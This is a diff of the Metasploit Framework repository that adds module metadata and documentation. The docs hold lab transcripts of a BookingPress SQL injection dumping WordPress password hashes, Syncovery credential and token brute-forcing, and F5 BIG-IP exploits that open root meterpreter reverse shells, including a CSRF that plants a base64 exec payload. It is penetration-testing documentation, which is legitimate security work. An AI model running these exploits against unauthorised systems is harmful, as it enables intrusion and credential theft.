  },
+  "post_windows/gather/credentials/solarwinds_orion_dump": {
+    "name": "SolarWinds Orion Secrets Dump",
+    "fullname": "post/windows/gather/credentials/solarwinds_orion_dump",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2022-11-08",
+    "type": "post",
+    "author": [
+      "npm <npm@cesium137.io>",
+      "Rob Fuller"
+    ],
+    "description": "This module exports and decrypts credentials from SolarWinds Orion Network\n          Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation\n          module for Windows hosts with SolarWinds Orion NPM installed. The module\n          supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for\n          extraction and decryption of the data are provided to allow session migration\n          during execution in order to log in to the SQL database using SSPI. Tested on\n          the 2020 version of SolarWinds Orion NPM. This module is possible only because\n          of the source code and technical information published by Rob Fuller and\n          Atredis Partners.",
+    "references": [
+      "URL-https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/",
+      "URL-https://github.com/atredispartners/solarwinds-orion-cryptography"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-12-20 08:55:19 +0000",
+    "path": "/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/solarwinds_orion_dump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/spark_im": {
    "name": "Windows Gather Spark IM Password Extraction",
    "fullname": "post/windows/gather/credentials/spark_im",
@@ -216166,7 +217171,7 @@
    "author": [
      "mubix <mubix@hak5.org>"
    ],
-    "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n        are set it pulls the current user, else it will pull the user's settings\n        specified SID and target host.",
+    "description": "This module pulls a user's proxy settings. If neither RHOST or SID\n        are set it pulls the current user, else it will pull the user's settings\n        for the specified SID and target host.",
    "references": [

    ],
@@ -216176,7 +217181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 15:10:47 +0000",
    "path": "/modules/post/windows/gather/enum_proxy.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_proxy",
@@ -216184,9 +217189,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -219380,7 +220396,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/post/windows/manage/sticky_keys.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/sticky_keys",
@@ -1 +1 @@
-3.0.2
+3.0.5
@@ -1,8 +1,11 @@
 source 'https://rubygems.org'

-gem 'jekyll', '~> 4.2.0'
+gem 'jekyll', '~> 4.3.0'
 gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
+# Useful when testing local just-the-docs changes:
+#gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
+gem 'rexml'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -1,6 +1,6 @@
 GIT
  remote: https://github.com/rapid7/just-the-docs.git
-  revision: 9c5e78f98185406e50ab04f523a86bd857e186cf
+  revision: 5c7ea378f6392ea19b52e8019ebaca8fc2331733
  branch: r7_ver_custom
  specs:
    just-the-docs (0.3.3)
@@ -12,8 +12,8 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
@@ -25,23 +25,24 @@ GEM
    ffi (1.15.5)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
-    jekyll (4.2.2)
+    jekyll (4.3.1)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
      i18n (~> 1.0)
-      jekyll-sass-converter (~> 2.0)
+      jekyll-sass-converter (>= 2.0, < 4.0)
      jekyll-watch (~> 2.0)
-      kramdown (~> 2.3)
+      kramdown (~> 2.3, >= 2.3.1)
      kramdown-parser-gfm (~> 1.0)
      liquid (~> 4.0)
-      mercenary (~> 0.4.0)
+      mercenary (>= 0.3.6, < 0.5)
      pathutil (~> 0.9)
-      rouge (~> 3.0)
+      rouge (>= 3.0, < 5.0)
      safe_yaml (~> 1.0)
-      terminal-table (~> 2.0)
+      terminal-table (>= 1.8, < 4.0)
+      webrick (~> 1.7)
    jekyll-include-cache (0.2.1)
      jekyll (>= 3.7, < 5.0)
    jekyll-sass-converter (2.2.0)
@@ -52,7 +53,7 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.3.2)
+    kramdown (2.4.0)
      rexml
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
@@ -64,35 +65,36 @@ GEM
    method_source (1.0.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.13.1)
+    pry (0.14.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.9.0)
+    pry-byebug (3.10.1)
      byebug (~> 11.0)
-      pry (~> 0.13.0)
-    public_suffix (4.0.7)
+      pry (>= 0.13, < 0.15)
+    public_suffix (5.0.1)
    rake (13.0.6)
-    rb-fsevent (0.11.1)
+    rb-fsevent (0.11.2)
    rb-inotify (0.10.1)
      ffi (~> 1.0)
    rexml (3.2.5)
-    rouge (3.28.0)
+    rouge (4.0.0)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    terminal-table (2.0.0)
-      unicode-display_width (~> 1.1, >= 1.1.1)
-    unicode-display_width (1.8.0)
+    terminal-table (3.0.2)
+      unicode-display_width (>= 1.1.1, < 3)
+    unicode-display_width (2.3.0)
    webrick (1.7.0)

 PLATFORMS
  ruby

 DEPENDENCIES
-  jekyll (~> 4.2.0)
+  jekyll (~> 4.3.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
+  rexml
  tzinfo (~> 1.2)
  tzinfo-data
  wdm (~> 0.1.1)
@@ -30,6 +30,9 @@ exclude:
  - README.md

 # just-the-docs config
+mermaid_enabled: true
+mermaid:
+  version: "9.2.2"
 heading_anchors: true
 aux_links_new_tab: true
 aux_links:
@@ -28,7 +28,7 @@ A listed `idea` is a seed for GSoC students to expand on and propose how to desi

 A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).

-GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution patten you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.
+GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

 Once you have started digging feel free ask questions that help you understand the concepts you for the idea would like to propose.

@@ -0,0 +1,220 @@
+## Vulnerable Application
+
+The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data
+in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action
+(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
+As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
+data from the backend database such as usernames and password hashes.
+
+This module uses this vulnerability to dump the list of WordPress users and their associated
+email addresses and password hashes for cracking offline.
+
+### Setup
+#### Ubuntu 20.04 with Docksal
+Install Docksal:
+
+```bash
+sudo apt update
+sudo apt install curl
+bash <(curl -fsSL https://get.docksal.io)
+sudo usermod -aG docker $USER
+```
+
+Reboot the VM (Docksal needs to be able to run `docker` without sudo).
+
+```bash
+msfuser@ubuntu:~$ fin project create
+1. Name your project (lowercase alphanumeric, underscore, and hyphen): msf
+
+2. What would you like to install?
+   PHP based
+    1.  Drupal 9 (Composer Version)
+    2.  Drupal 9 (BLT Version)
+    3.  Drupal 9
+    4.  Drupal 7
+    5.  Wordpress
+    6.  Magento
+    7. Laravel
+    8. Symfony Skeleton
+    9. Symfony WebApp
+    10. Grav CMS
+    11. Backdrop CMS
+
+Go based
+12. Hugo
+
+JS based
+13. Gatsby JS
+14. Angular
+
+HTML
+15. Static HTML site
+
+Custom
+0. Custom git repository
+
+
+Enter your choice (0-15): 5
+
+Project folder:   /home/msfuser/msf
+Project software: Wordpress
+Source repo:      https://github.com/docksal/boilerplate-wordpress.git
+Source branch:    <default>
+Project URL:      http://msf.docksal
+
+Do you wish to proceed? [y/n]: y
+
+...
+
+Success: WordPress installed successfully.
+
+real	0m10.112s
+user	0m0.327s
+sys	0m0.061s
+Open http://msf-wp.docksal in your browser to verify the setup.
+Admin panel: http://msf-wp.docksal/wp-admin. User/password: admin/admin
+ DONE!  Completed all initialization steps.
+```
+
+Download a vulnerable version of BookingPress:
+`wget https://downloads.wordpress.org/plugin/bookingpress-appointment-booking.1.0.10.zip`
+
+Navigate to the WordPress admin page that was just setup by Docksal at
+http://msf-wp.docksal/wp-admin and log in with the username `admin` and password `admin`.
+
+Navigate to `Plugins` on the left hand menu, then select `Add New` then select `Upload Plugin`.
+
+Select `Browse...` and browse to the `bookingpress-appointment-booking.1.0.10.zip` file just downloaded, click `Install Now`.
+
+You should see the following output in the browser:
+
+```
+Installing Plugin from uploaded file: bookingpress-appointment-booking.1.0.10.zip
+
+Unpacking the package…
+
+Installing the plugin…
+
+Plugin installed successfully.
+```
+
+Click `Activate Plugin`.
+
+The BookingPress plugin has to be in use on the WordPress site in order to exploit the vulnerability.
+To activate it, follow the directions below:
+
+1. Navigate to `/wp-admin/admin.php?page=bookingpress_services`.
+1. Click `Manage Categories`, then click `+ Add New`, enter a `Category Name` and click `Save`.
+1. Beside `Manage Services` click `+ Add New`, enter a `Service Name`, enter the Category you just created in the `Category` dropdown, enter a `Price` and click `Save`.
+1. Select `+ New` at the top of the screen and then select `Page` from the dropdown to create a new WordPress page.
+1. Paste `[bookingpress_form]` on the new page and click `publish`.
+1. Navigate to `/bookingpress/` and you should see BookPress running with the Category / Service you created in step 1.
+
+### Installation Notes
+You may need to increase the size of file uploads to install the BookingPress plugin. To do this, you can use
+https://wordpress.org/plugins/tuxedo-big-file-uploads/ or https://wordpress.org/plugins/wp-maximum-upload-file-size/
+to increase the file upload size. I then had to some fiddling around since it may take some time for the changes
+to be picked up. You may have success if you also install https://wordpress.org/plugins/custom-php-settings/, so
+this is worth a shot if you are having issues.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Do: `use auxiliary/gather/wp_bookingpress_category_services_sqli`.
+1. Set the options `RHOSTS` to the target WordPress host IP address.
+1. Set `RPORT` to the port that the target WordPress install is running on.
+1. Set `BOOKING_PRESS_PAGE` to the path on the WordPress host where the BookingPress make a booking page is.
+1. Verify visiting this URL shows "Select Category" and "Select Service" on the resulting page.
+1. Run the module.
+1. Receive a table of WordPress users and their associated email addresses and password hashes.
+
+## Scenarios
+### Booking Press 1.0.10, WordPress Running Via Docksal, Ubuntu 20.04
+```
+msf6 > use gather/wp_bookingpress_category_services_sqli
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts localhost
+rhosts => localhost
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rport 8000
+rport => 8000
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username       Email                         Hash
+ --------       -----                         ----
+ admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
+ hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
+ mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
+ msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
+ todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set AutoCheck false
+AutoCheck => false
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
+
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username       Email                         Hash
+ --------       -----                         ----
+ admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
+ hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
+ mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
+ msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
+ todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) >
+```
+
+### Booking Press 1.0.10, WordPress Latest Docker Image on Debian 11 (bullseye)
+```
+msf6 > use auxiliary/gather/wp_bookingpress_category_services_sqli
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RPORT 8000
+RPORT => 8000
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI "/?page_id=10"
+TARGETURI => /?page_id=10
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > show options
+
+Module options (auxiliary/gather/wp_bookingpress_category_services_sqli):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8000             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /?page_id=10     yes       The URL of the BookingPress appointment booking page
+   VHOST                       no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > check
+[+] 127.0.0.1:8000 - The target is vulnerable.
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > exploit
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Extracting credential information
+Wordpress User Credentials
+==========================
+
+ Username   Email                  Hash
+ --------   -----                  ----
+ normal     normal@test.com        $P$Bu9/XNK93oyUTKO.zJ9yGZfYAcbZg9.
+ testAdmin  test@testfakeness.com  $P$BYWtZOfh8yqLCKA877hwBysqGdRtk/.
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) >
+```
@@ -0,0 +1,81 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module attempts to brute-force valid login credentials for the Syncovery File Sync & Backup Software Web-GUI for Linux.
+The default credentials are checked by default.
+
+### Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+### Platforms
+
+- Unix
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use modules/auxiliary/scanner/http/syncovery_linux_login`
+4. Do: `set RHOSTS <TARGET HOSTS>`
+5. Do: `run`
+6. On success you should get valid credentials.
+
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use modules/auxiliary/scanner/http/syncovery_linux_login
+msf6 auxiliary(scanner/http/syncovery_linux_login) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_login) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_login):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   BLANK_PASSWORDS   false            no        Try blank passwords for all users
+   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
+   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
+   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
+   DB_ALL_USERS      false            no        Add all users in the current database to the list
+   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
+   PASSWORD          pass             no        The password to Syncovery (default: pass)
+   PASS_FILE                          no        File containing passwords, one per line
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT             8999             yes       The target port (TCP)
+   SSL               false            no        Negotiate SSL/TLS for outgoing connections
+   STOP_ON_SUCCESS   true             yes       Stop guessing when a credential works for a host
+   TARGETURI         /                no        The path to Syncovery
+   THREADS           1                yes       The number of concurrent threads (max one per host)
+   USERNAME          default          yes       The username to Syncovery (default: default)
+   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
+   USER_AS_PASS      false            no        Try the username as the password for all users
+   USER_FILE                          no        File containing usernames, one per line
+   VERBOSE           true             yes       Whether to print output for all attempts
+   VHOST                              no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_login) > run
+
+[+] 192.168.178.26:8999 - Syncovery File Sync & Backup Software confirmed
+[+] 192.168.178.26:8999 - Identified version: 9.48a
+[+] 192.168.178.26:8999 - Success: 'default:pass'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,77 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
+by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
+By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
+The vulnerability exists, because in Syncovery session tokens are basically just `base64(m/d/Y H:M:S)` at the time
+of the login instead of a random token.
+If a user does not logout, the token stays valid until next reboot. Note that the mobile version of the WEB GUI
+as well as the obsolete branch 8 of Syncovery do not have a logout button.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+### Setup
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `run`
+5. On success you should get a valid token.
+
+## Options
+
+### TARGETURI
+The path to Syncovery login mask.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > options
+
+Module options (auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DAYS       1                yes       Check today and last X day(s) for valid session token
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                no        The path to Syncovery
+   THREADS    1                yes       The number of concurrent threads (max one per host)
+   VHOST                       no        HTTP server virtual host
+
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 auxiliary(scanner/http/syncovery_linux_token_cve_2022_36536) > run
+
+[*] 192.168.178.26:8999 - Starting Brute-Forcer
+[+] 192.168.178.26:8999 - Valid token found: 'MDkvMDYvMjAyMiAxMzo0NDoxMg=='
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Limitations
+In Syncovery v9.x tokens get invalidated after the user logs out. In this case no valid token can be found.
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
+4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
+5. Do: `run`
+6. You should get a session
+
+## Options
+
+### `HttpUsername` / `HttpPassword`
+
+The account to authorize as - requires console access. The `admin` account (which
+is the default `HttpUsername`) works great, if you have the password.
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1
+
+This should be the normal experience:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword iagotestbigip
+HttpPassword => mybigippassword
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Creating an .rpmspec file on the target...
+[*] Created spec file: /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[*] Building the RPM to trigger the payload...
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/wOXt3-4.1.3-0.8.6.noarch.rpm
+[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:38556) at 2022-11-14 15:14:23 -0800
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,217 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+This is a CSRF vuln, so it requires a browser in addition to msf:
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
+4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
+5. Do: `run`
+6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
+7. Open a browser and visit that URL
+8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)
+
+## Options
+
+### `TARGET_HOST` / `TARGET_URI` / `TARGET_SSL`
+
+These are the target that the user will be redirected to
+
+### `FILENAME`
+
+If the `TARGET` is `2` (`Custom`), the file that will be overwritten with the payload
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 - Target 0 (Restart)
+
+Start the listener:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+```
+
+Then, a legit user that has HTTP Basic authentication (or who can be tricked
+into performing HTTP Basic authentication) needs to visit that URL. When any
+user connects, they'll be redirected to the SOAP endpoint and you'll see:
+
+```
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+
+[... wait for a user to visit the URL ...]
+
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+```
+
+We have no way to tell whether this was successful; however, if we already have
+access to the target (ie, if you're testing this), we can check if the file was
+successfully planted:
+
+```
+[root@bigip:Active:Standalone] config # cat /shared/f5_update_action 
+UpdateAction
+https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+https://localhost/error
+0
+0
+0
+0
+```
+
+The code planted there will activate at reboot. So, ...wait till the target
+reboots. Perhaps when they update! Again, if you have shell access, you can
+check the log file when it boots:
+
+```
+[root@bigip:INOPERATIVE:] config # tail -f /var/log/f5_update_checker.out
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file found -- parsing
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file action: "UpdateAction"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Executing EM action: UpdateAction
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
+[...wait 2 minutes...]
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Finished sleeping.
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Attempting to connect to EM server: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+And, on Metasploit:
+
+```
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+[...wait 2 minutes...]
+[*] Sending stage (40164 bytes) to 10.0.0.162
+[+] Deleted /var/log/f5_update_checker.out
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:51388) at 2022-11-14 15:28:04 -0800
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 1 (Login)
+
+This works similarly.. use the module, set the `TARGET_HOST`, and set the
+`TARGET` to `1`:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 1
